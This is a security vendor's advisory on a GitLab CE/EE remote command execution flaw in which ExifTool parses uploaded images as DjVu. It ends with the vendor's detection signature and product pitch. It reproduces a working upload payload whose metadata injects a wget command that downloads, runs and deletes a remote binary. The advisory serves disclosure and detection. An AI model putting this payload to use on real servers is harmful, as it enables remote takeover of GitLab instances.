GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Files that are uploaded with extensions of jpg, jpeg or tiff are passed to the ExifTool to remove any unauthorised tags. The issue is that the file extension will be ignored and the ExifTool will try to determine the type based on the content.
Content-Disposition: form-data; name="file"; filename="test.jpg" Content-Type: image/jpeg Content-Transfer-Encoding: binary AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO... ......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44..... FORM....DJVIANTa...P(metadata (Copyright "\ " . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \ " b ") )
By turning this vulnerability into a traffic file and matching rule, we are able to detect attempts to upload files which don't match the content type.
Idappcom has created signature 8021990 along with a traffic file.
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional